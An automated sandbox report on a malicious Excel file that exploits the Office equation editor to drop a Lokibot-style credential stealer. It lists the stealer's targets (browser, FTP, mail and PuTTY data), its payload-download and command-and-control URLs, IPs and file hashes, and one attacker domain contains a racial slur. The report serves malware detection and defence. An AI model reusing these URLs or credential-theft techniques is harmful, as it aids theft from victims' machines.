              Source: vbc.exe, 00000005.00000002.2391902240.0000000000F20000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: vbc.exe, 00000005.00000002.2391902240.0000000000F20000.00000002.00000001.sdmpBinary or memory string: !Progman
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
              Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
              Source: C:\Users\Public\vbc.exeCode function: 5_2_00406069 GetUserNameW,
              Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information:

              barindex
              Yara detected LokibotShow sources
              Source: Yara matchFile source: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2196847340.0000000003C0A000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3040, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2952, type: MEMORY
              Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
              Tries to harvest and steal browser information (history, passwords, etc)Show sources
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
              Source: C:\Users\Public\vbc.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
              Tries to harvest and steal ftp login credentialsShow sources
              Source: C:\Users\Public\vbc.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
              Source: C:\Users\Public\vbc.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
              Source: C:\Users\Public\vbc.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
              Source: C:\Users\Public\vbc.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
              Tries to steal Mail credentials (via file access)Show sources
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
              Tries to steal Mail credentials (via file registry)Show sources
              Source: C:\Users\Public\vbc.exeCode function: PopPassword
              Source: C:\Users\Public\vbc.exeCode function: SmtpPassword
              Source: Yara matchFile source: 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2196353588.0000000002648000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2196847340.0000000003C0A000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 3040, type: MEMORY
              Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsExploitation for Client Execution13Path InterceptionExtra Window Memory Injection1Disable or Modify Tools11OS Credential Dumping2Account Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer15Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsAccess Token Manipulation1Deobfuscate/Decode Files or Information1Credentials in Registry2File and Directory Discovery2Remote Desktop ProtocolMan in the Browser1Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Process Injection112Obfuscated Files or Information41Security Account ManagerSystem Information Discovery13SMB/Windows Admin SharesData from Local System2Automated ExfiltrationNon-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing22NTDSSecurity Software Discovery211Distributed Component Object ModelEmail Collection1Scheduled TransferApplication Layer Protocol124SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptTimestomp1LSA SecretsVirtualization/Sandbox Evasion2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.commonExtra Window Memory Injection1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading111DCSyncSystem Owner/User Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobVirtualization/Sandbox Evasion2Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Access Token Manipulation1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Process Injection112Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 332678 Sample: MV NAGOYA TRADER.xlsx Startdate: 21/12/2020 Architecture: WINDOWS Score: 100 31 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->31 33 Multi AV Scanner detection for domain / URL 2->33 35 Malicious sample detected (through community Yara rule) 2->35 37 19 other signatures 2->37 7 EQNEDT32.EXE 12 2->7         started        12 EXCEL.EXE 37 17 2->12         started        process3 dnsIp4 29 chnesstdyqudusisabadassniggainthestfmv.ydns.eu 103.141.138.119, 49167, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam 7->29 21 C:\Users\user\AppData\...\svchost[1].exe, PE32 7->21 dropped 23 C:\Users\Public\vbc.exe, PE32 7->23 dropped 47 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 7->47 14 vbc.exe 1 5 7->14         started        25 C:\Users\user\...\~$MV NAGOYA TRADER.xlsx, data 12->25 dropped file5 signatures6 process7 signatures8 49 Multi AV Scanner detection for dropped file 14->49 51 Detected unpacking (changes PE section rights) 14->51 53 Detected unpacking (overwrites its own PE header) 14->53 55 3 other signatures 14->55 17 vbc.exe 54 14->17         started        process9 dnsIp10 27 begadi.ga 185.193.143.118, 49168, 49169, 49170 DIGITALENERGY-ASRU Russian Federation 17->27 39 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 17->39 41 Tries to steal Mail credentials (via file access) 17->41 43 Tries to harvest and steal ftp login credentials 17->43 45 Tries to harvest and steal browser information (history, passwords, etc) 17->45 signatures11

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.

              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              MV NAGOYA TRADER.xlsx32%VirustotalBrowse
              MV NAGOYA TRADER.xlsx25%ReversingLabsDocument-Word.Trojan.Heuristic

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe100%Joe Sandbox ML
              C:\Users\Public\vbc.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe33%ReversingLabsWin32.Trojan.Wacatac
              C:\Users\Public\vbc.exe33%ReversingLabsWin32.Trojan.Wacatac

              Unpacked PE Files

              SourceDetectionScannerLabelLinkDownload
              5.2.vbc.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              4.2.vbc.exe.e80000.2.unpack100%AviraHEUR/AGEN.1109526Download File

              Domains

              SourceDetectionScannerLabelLink
              begadi.ga12%VirustotalBrowse
              chnesstdyqudusisabadassniggainthestfmv.ydns.eu1%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://www.%s.comPA0%URL Reputationsafe
              http://www.%s.comPA0%URL Reputationsafe
              http://www.%s.comPA0%URL Reputationsafe
              http://www.%s.comPA0%URL Reputationsafe
              http://chnesstdyqudusisabadassniggainthestfmv.ydns.eu/secure/svchost.exe6%VirustotalBrowse
              http://chnesstdyqudusisabadassniggainthestfmv.ydns.eu/secure/svchost.exe100%Avira URL Cloudmalware
              http://www.ibsensoftware.com/0%URL Reputationsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe
              http://begadi.ga/chud/gate.php13%VirustotalBrowse
              http://begadi.ga/chud/gate.php0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              begadi.ga
              		185.193.143.118
              		truetrueunknown
              chnesstdyqudusisabadassniggainthestfmv.ydns.eu
              		103.141.138.119
              		truetrueunknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://chnesstdyqudusisabadassniggainthestfmv.ydns.eu/secure/svchost.exetrue
              • 6%, Virustotal, Browse
              • Avira URL Cloud: malware
              		unknown
              http://begadi.ga/chud/gate.phptrue
              • 13%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.%s.comPAvbc.exe, 00000005.00000002.2391988009.0000000002600000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		low
              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.vbc.exe, 00000005.00000002.2391988009.0000000002600000.00000002.00000001.sdmpfalse
                		high
                http://www.ibsensoftware.com/vbc.exe, vbc.exe, 00000005.00000002.2391430230.0000000000400000.00000040.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                103.141.138.119
                		unknownViet Nam
                		135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue
                185.193.143.118
                		unknownRussian Federation
                		43830DIGITALENERGY-ASRUtrue

                General Information

                Joe Sandbox Version:31.0.0 Red Diamond
                Analysis ID:332678
                Start date:21.12.2020
                Start time:08:31:47
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 6m 23s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:MV NAGOYA TRADER.xlsx
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:6
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.spyw.expl.evad.winXLSX@6/8@182/2
                EGA Information:Failed
                HDC Information:
                • Successful, ratio: 29.4% (good quality ratio 26.3%)
                • Quality average: 68.3%
                • Quality standard deviation: 34.5%
                HCA Information:
                • Successful, ratio: 96%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .xlsx
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): dllhost.exe
                • HTTP Packets have been reduced
                • TCP Packets have been reduced to 100
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtCreateFile calls found.
                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                • Report size getting too big, too many NtEnumerateValueKey calls found.
                • Report size getting too big, too many NtQueryAttributesFile calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                08:33:19API Interceptor67x Sleep call for process: EQNEDT32.EXE modified
                08:33:22API Interceptor911x Sleep call for process: vbc.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                103.141.138.119MV NEW WIND.xlsxGet hashmaliciousBrowse
                • wsdychnesqudusisabadassniggainthewsbkw.ydns.eu/secure/svchost.exe
                Payment list.xlsxGet hashmaliciousBrowse
                • wsdychnesqudusisabadassniggainthewsbkw.ydns.eu/secure/svchost.exe
                MT Tordis Knutsen_20CF18909.xlsxGet hashmaliciousBrowse
                • chnesstdyqudusisabadassniggainthestgls.ydns.eu/secure/svchost.exe
                MV CAPTAIN SEA.xlsxGet hashmaliciousBrowse
                • chnesstdyqudusisabadassniggainthestgls.ydns.eu/secure/svchost.exe
                MV Hyundai Voyager.xlsxGet hashmaliciousBrowse
                • chnesstdyqudusisabadassniggainthestgls.ydns.eu/secure/svchost.exe
                MV OCEAN CRYSTAL.xlsxGet hashmaliciousBrowse
                • wsdychnesqudusisabadassniggainthewsbkq.ydns.eu/secure/svchost.exe
                RFQ 12-20.xlsxGet hashmaliciousBrowse
                • chnessndyqudusisabadassniggainthesnoop.ydns.eu/secure/svchost.exe
                Soa.xlsxGet hashmaliciousBrowse
                • chnessndyqudusisabadassniggainthesnoop.ydns.eu/secure/svchost.exe
                185.193.143.118MT TBN.xlsxGet hashmaliciousBrowse
                • webtex.ga/akin/gate.php
                MV JIN SHENG SHUI.xlsxGet hashmaliciousBrowse
                • begadi.ga/kayo/gate.php
                7Ic3eiRuEv.exeGet hashmaliciousBrowse
                • begadi.ga/chud/gate.php
                tElBu1fWfG.exeGet hashmaliciousBrowse
                • begadi.ga/chud/gate.php
                MV TBN.xlsxGet hashmaliciousBrowse
                • webtex.ga/akin/gate.php
                MV NEW WIND.xlsxGet hashmaliciousBrowse
                • begadi.ga/chud/gate.php
                TMB-CI2006-003.xlsxGet hashmaliciousBrowse
                • begadi.ga/kayo/gate.php
                SecuriteInfo.com.ArtemisDED64E567DBA.exeGet hashmaliciousBrowse
                • webtex.ga/akin/gate.php
                SecuriteInfo.com.BehavesLike.Win32.Generic.hc.exeGet hashmaliciousBrowse
                • begadi.ga/kayo/gate.php

                Domains

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                begadi.gaMV JIN SHENG SHUI.xlsxGet hashmaliciousBrowse
                • 185.193.143.118
                7Ic3eiRuEv.exeGet hashmaliciousBrowse
                • 185.193.143.118
                tElBu1fWfG.exeGet hashmaliciousBrowse
                • 185.193.143.118
                MV NEW WIND.xlsxGet hashmaliciousBrowse
                • 185.193.143.118
                TMB-CI2006-003.xlsxGet hashmaliciousBrowse
                • 185.193.143.118
                SecuriteInfo.com.BehavesLike.Win32.Generic.hc.exeGet hashmaliciousBrowse
                • 185.193.143.118
                SecuriteInfo.com.Trojan.PackedNET.405.10494.exeGet hashmaliciousBrowse
                • 176.118.165.175
                GlobalSuppl_RFQ_8W9.xlsxGet hashmaliciousBrowse
                • 176.118.165.175
                AUEhcNNYn5.exeGet hashmaliciousBrowse
                • 176.118.165.175
                2Q2RgXBORF.exeGet hashmaliciousBrowse
                • 176.118.165.175
                PO_RFQ82920_GlobalSuppl_.xlsxGet hashmaliciousBrowse
                • 176.118.165.175
                KOyrUyOISf.exeGet hashmaliciousBrowse
                • 176.118.165.175
                XPjCFNIYA7.exeGet hashmaliciousBrowse
                • 176.118.165.175
                7KHnPipjN9.exeGet hashmaliciousBrowse
                • 176.118.165.175
                MV CAPTAIN SEA.xlsxGet hashmaliciousBrowse
                • 176.118.165.175
                aquYBtxJYY.exeGet hashmaliciousBrowse
                • 176.118.165.175
                _PO_8392_Globalsuppl_.xlsxGet hashmaliciousBrowse
                • 176.118.165.175
                SecuriteInfo.com.Trojan.PWS.Stealer.29680.21070.exeGet hashmaliciousBrowse
                • 176.118.165.175
                MV Hyundai Voyager.xlsxGet hashmaliciousBrowse
                • 176.118.165.175
                12U72AeB5B.exeGet hashmaliciousBrowse
                • 176.118.165.175

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNSKM_C258201001130020005057.exeGet hashmaliciousBrowse
                • 103.99.1.128
                Order Acknowledgement - 133410.xlsxGet hashmaliciousBrowse
                • 103.125.191.187
                MT TBN.xlsxGet hashmaliciousBrowse
                • 103.141.138.122
                New Import and Export Regulation.xlsxGet hashmaliciousBrowse
                • 103.141.138.118
                MV JIN SHENG SHUI.xlsxGet hashmaliciousBrowse
                • 103.141.138.123
                fdwv4hWF1M.exeGet hashmaliciousBrowse
                • 103.78.94.94
                MV TBN.xlsxGet hashmaliciousBrowse
                • 103.141.138.122
                MV NEW WIND.xlsxGet hashmaliciousBrowse
                • 103.141.138.119
                Quotation Doc Invoice.xlsxGet hashmaliciousBrowse
                • 103.125.191.187
                INVOICE AND PACKING LIST.xlsxGet hashmaliciousBrowse
                • 103.125.191.5
                TMB-CI2006-003.xlsxGet hashmaliciousBrowse
                • 103.141.138.123
                GlobalSuppl_RFQ_8W9.xlsxGet hashmaliciousBrowse
                • 103.141.138.126
                Payment.jarGet hashmaliciousBrowse
                • 180.214.236.99
                PO Request- 02201756801.xlsxGet hashmaliciousBrowse
                • 103.125.191.229
                PT.Sari ContractPT.Sari Proforma.pda.xlsxGet hashmaliciousBrowse
                • 103.125.191.187
                Payment list.xlsxGet hashmaliciousBrowse
                • 103.141.138.119
                MAERSK KLEVEN V.949E.xlsxGet hashmaliciousBrowse
                • 103.141.138.122
                Image16122020.exeGet hashmaliciousBrowse
                • 103.99.1.128
                Xeron_Scan02117110021.exeGet hashmaliciousBrowse
                • 103.99.1.128
                MT Tordis Knutsen_20CF18909.xlsxGet hashmaliciousBrowse
                • 103.141.138.119
                DIGITALENERGY-ASRUMT TBN.xlsxGet hashmaliciousBrowse
                • 185.193.143.118
                MV JIN SHENG SHUI.xlsxGet hashmaliciousBrowse
                • 185.193.143.118
                7Ic3eiRuEv.exeGet hashmaliciousBrowse
                • 185.193.143.118
                tElBu1fWfG.exeGet hashmaliciousBrowse
                • 185.193.143.118
                MV TBN.xlsxGet hashmaliciousBrowse
                • 185.193.143.118
                MV NEW WIND.xlsxGet hashmaliciousBrowse
                • 185.193.143.118
                TMB-CI2006-003.xlsxGet hashmaliciousBrowse
                • 185.193.143.118
                SecuriteInfo.com.ArtemisDED64E567DBA.exeGet hashmaliciousBrowse
                • 185.193.143.118
                SecuriteInfo.com.BehavesLike.Win32.Generic.hc.exeGet hashmaliciousBrowse
                • 185.193.143.118
                SecuriteInfo.com.Trojan.PackedNET.405.10494.exeGet hashmaliciousBrowse
                • 176.118.165.175
                GlobalSuppl_RFQ_8W9.xlsxGet hashmaliciousBrowse
                • 176.118.165.175
                SecuriteInfo.com.Trojan.PWS.Siggen2.60864.9279.exeGet hashmaliciousBrowse
                • 176.118.165.175
                SecuriteInfo.com.Trojan.PackedNET.405.12933.exeGet hashmaliciousBrowse
                • 176.118.165.175
                Payment_Advice_pdf.exeGet hashmaliciousBrowse
                • 176.118.165.175
                Enq2381813839_pdf.exeGet hashmaliciousBrowse
                • 176.118.165.175
                PO Request- 02201756801.xlsxGet hashmaliciousBrowse
                • 176.118.165.175
                Payment_Advice_pdf.exeGet hashmaliciousBrowse
                • 176.118.165.175
                Enq2381813839_pdf.exeGet hashmaliciousBrowse
                • 176.118.165.175
                Payment list.xlsxGet hashmaliciousBrowse
                • 176.118.165.175
                MAERSK KLEVEN V.949E.xlsxGet hashmaliciousBrowse
                • 176.118.165.175

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:downloaded
                Size (bytes):584704
                Entropy (8bit):7.31402329860771
                Encrypted:false
                SSDEEP:12288:ek3fNrqcsXP04X8QGETcxAtAHp5LcPgKaIJVPfHAZ0xnJWBIlO+T2U7H:vfYJ/04XuE0Agp54PH
                MD5:3EE960D7D595C82B47CE28164AFED056
                SHA1:FD750607C392744A3302538C2A0B0FE810D199BB
                SHA-256:7596F11C31683CC9137672D261E19B4DD61952BAD97545080A1663AB475283B2
                SHA-512:F5432D376F7390C3A4EAD25CD167286FB9B99421354302AFF7739B30AB2DF825EAE16D05DE1308268DF27B60B01F8150A42707C7B6367A5D051E0AD443A49462
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 33%
                Reputation:low
                IE Cache URL:http://chnesstdyqudusisabadassniggainthestfmv.ydns.eu/secure/svchost.exe
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....V................0.................. ... ....@.. .......................`............@.....................................S.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........................V...{...........................................].:....w..H.3...c.abf............%..........;x;x. @...o.p.1.........G.e..W..@+...Qx..".B.Y.|^..C...3&..S..~........../......uv/@..iMM.%.....'.......=1.4z..|.)..Q\.KU...M.A{.|...;...51.F.lp..e..niy...C....U1\M.Ri......(..R?..EN.%....v~..l........#$...)J.B=.5.q...@U.G.....e..c.z....Zu...A.Wua)b.1...`..:<^...A\){...;...,...g..2.......?p{x@...D'.%..e`$x..hP........8O...VZ........#.ck.p-.T...V
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3CDE7269.jpeg
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                Category:dropped
                Size (bytes):48770
                Entropy (8bit):7.801842363879827
                Encrypted:false
                SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9981CA08.emf
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):1099960
                Entropy (8bit):2.015316229530797
                Encrypted:false
                SSDEEP:3072:qXtr8tV3Iqf4ZdAt06J6dabLr92W2qtX2cy:oahIFdyiaT2qtXw
                MD5:B40BF8F31F83A568F9E58B72151B217F
                SHA1:46673DEEFAB7DC50094AA9B090EB74CCB1809F61
                SHA-256:3F4B8A687BC4A0FF42F0FEB2E1195C57B437F77FE956FCA4D76851685D7E1A8A
                SHA-512:57528718DF801D37374A2E5BD77F29A9A1CF84161D71E17345B83F2769D64695687DD06CE82C814E16208BB0F89EE13D15100A5D2DB495D653F72223D367328B
                Malicious:false
                Reputation:low
                Preview: ....l...........S................@...%.. EMF........&...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................I.......%...........%...................................R...p................................@."C.a.l.i.b.r.i........................................................................N.T.....................N.T........ ....y.Q........ ............z.Q............_...............................X...%...7...................{ .@................C.a.l.i.b.r.................X.......D....2.Q.................{.Q............dv......%...........%...........%...........!.......................I......."...........%...........%...........%...........T...T..........................@.E.@T...........L...............I.......P... .t.6...F..........EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E522A556.jpeg
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:gd-jpeg v1.0 (using IJG JPEG v80), quality = 90", baseline, precision 8, 700x990, frames 3
                Category:dropped
                Size (bytes):48770
                Entropy (8bit):7.801842363879827
                Encrypted:false
                SSDEEP:768:uLgWImQ6AMqTeyjskbJeYnriZvApugsiKi7iszQ2rvBZzmFz3/soBqZhsglgDQPT:uLgY4MqTeywVYr+0ugbDTzQ27A3UXsgf
                MD5:AA7A56E6A97FFA9390DA10A2EC0C5805
                SHA1:200A6D7ED9F485DD5A7B9D79B596DE3ECEBD834A
                SHA-256:56B1EDECC9A282A9FAAFD95D4D9844608B1AE5CCC8731F34F8B30B3825734974
                SHA-512:A532FE4C52FED46919003A96B882AE6F7C70A3197AA57BD1E6E917F766729F7C9C1261C36F082FBE891852D083EDB2B5A34B0A325B7C1D96D6E58B0BED6C5782
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: ......JFIF.............;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90....C....................................................................C............................................................................"............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..R..(...(...(......3Fh.....(....P.E.P.Gj(...(....Q@.%-...(.......P.QKE.%.........;.R.@.E-...(.......P.QKE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'jZ(...QE..........h...(...QE.&(.KE.'j^.....(...(...(....w...3Fh....E......4w...h.%...................E./J)(......Z)(......Z)(....
                C:\Users\user\AppData\Roaming\CF97F5\5879F5.lck
                Process:C:\Users\Public\vbc.exe
                File Type:very short file (no magic)
                Category:dropped
